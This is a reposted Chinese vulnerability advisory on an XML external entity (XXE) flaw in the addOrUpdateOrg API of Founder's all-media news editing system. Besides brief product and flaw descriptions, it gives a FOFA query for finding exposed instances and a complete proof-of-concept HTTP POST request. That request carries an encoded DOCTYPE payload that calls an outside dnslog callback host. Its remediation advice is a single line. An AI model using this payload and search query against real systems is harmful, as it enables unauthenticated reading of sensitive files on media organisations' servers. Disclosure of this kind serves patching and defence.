方正畅享全媒体新闻采编系统 addOrUpdateOrg xxe漏洞

0x01 产品描述：

     方正畅享全媒体新闻采编系统是一个集指挥中心、采集中心、编辑中心、发布中心、绩效考核中心和资料中心为一体的全媒体新闻采编系统‌，主要应用于媒体行业的深度融合，通过大数据和AI技术，实现新闻生产的策、采、编、发、存、传、评的全流程管理‌        

0x02 漏洞描述：

        方正畅享全媒体新闻采编系统 addOrUpdateOrg 接口处存在XML实体注入漏洞，未经身份认证的攻击者可以利用此漏洞读取系统内部敏感文件，获取敏感信息，使系统处于极不安全的状态。
0x03 搜索语句：

Fofa：app="FOUNDER-全媒体采编系统"

0x04 漏洞复现：

POST /newsedit/api/orgUser/addOrUpdateOrg HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Content-Type: application/x-www-form-urlencoded
Connection: close

xmlStr=%3C!DOCTYPE%20root%20%5B%20%3C!ENTITY%20%25%20remote%20SYSTEM%20%22http://gli10h.dnslog.cn/%22%3E%20%25remote;%5D%3E

0x05 修复建议：

厂商已发布补丁 请即时修复。

原文地址：https://blog.csdn.net/xc_214/article/details/142848099

免责声明：本站文章内容转载自网络资源，如本站内容侵犯了原著者的合法权益，可联系本站删除。更多内容请关注自学内容网（zxcms.com）！